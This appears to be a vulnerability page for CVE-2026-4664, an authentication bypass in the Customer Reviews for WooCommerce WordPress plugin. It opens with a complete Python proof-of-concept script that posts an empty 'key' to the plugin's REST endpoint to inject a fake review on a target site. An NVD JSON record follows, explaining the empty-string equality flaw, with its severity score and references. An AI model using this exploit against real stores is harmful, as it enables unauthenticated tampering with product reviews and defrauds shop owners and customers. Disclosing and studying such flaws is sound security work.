CVE-2026-4664

import requests def exploit_cve_2026_4664(target_url): """ PoC for CVE-2026-4664 Authentication Bypass in Customer Reviews for WooCommerce. This script attempts to inject a review using an empty key. """ endpoint = f"{target_url}/wp-json/ivole/v1/review" headers = { "Content-Type": "application/json" } # Payload exploiting the empty key bypass payload = { "key": "", # The empty string bypasses the strict check against an empty meta value "product_id": 1, # Target product ID "rating": 5, "title": "Great Product", "review": "This is a fake review injected via CVE-2026-4664 PoC.", "name": "Attacker", "email": "[email protected]" } try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Review likely submitted.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://example.com" exploit_cve_2026_4664(target)

{"cve": {"id": "CVE-2026-4664", "sourceIdentifier": "[email protected]", "published": "2026-04-10T02:16:03.710", "lastModified": "2026-04-24T18:01:58.517", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.103.0. This is due to the `create_review_permissions_check()` function comparing the user-supplied `key` parameter against the order's `ivole_secret_key` meta value using strict equality (`===`), without verifying that the stored key is non-empty. For orders where no review reminder email has been sent, the `ivole_secret_key` meta is not set, causing `get_meta()` to return an empty string. An attacker can supply `key: \"\"` to match this empty value and bypass the permission check. This makes it possible for unauthenticated attackers to submit, modify, and inject product reviews on any product — including products not associated with the referenced order — via the REST API endpoint `POST /ivole/v1/review`. Reviews are auto-approved by default since `ivole_enable_moderation` defaults to `\"no\"`."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/emails/class-cr-email.php#L345", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/reviews/class-cr-endpoint.php#L646", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/reviews/class-cr-endpoint.php#L654", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/customer-reviews-woocommerce/tags/5.102.0/includes/reviews/class-cr-endpoint.php#L655", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce/tags/5.103.0&new_path=%2Fcustomer-reviews-woocommerce/tags/5.104.0", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/customer-reviews-woocommerce/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/27e3dfe3-ad33-4d0c-a999-d0734df2f59b?source=cve", "source": "[email protected]"}]}}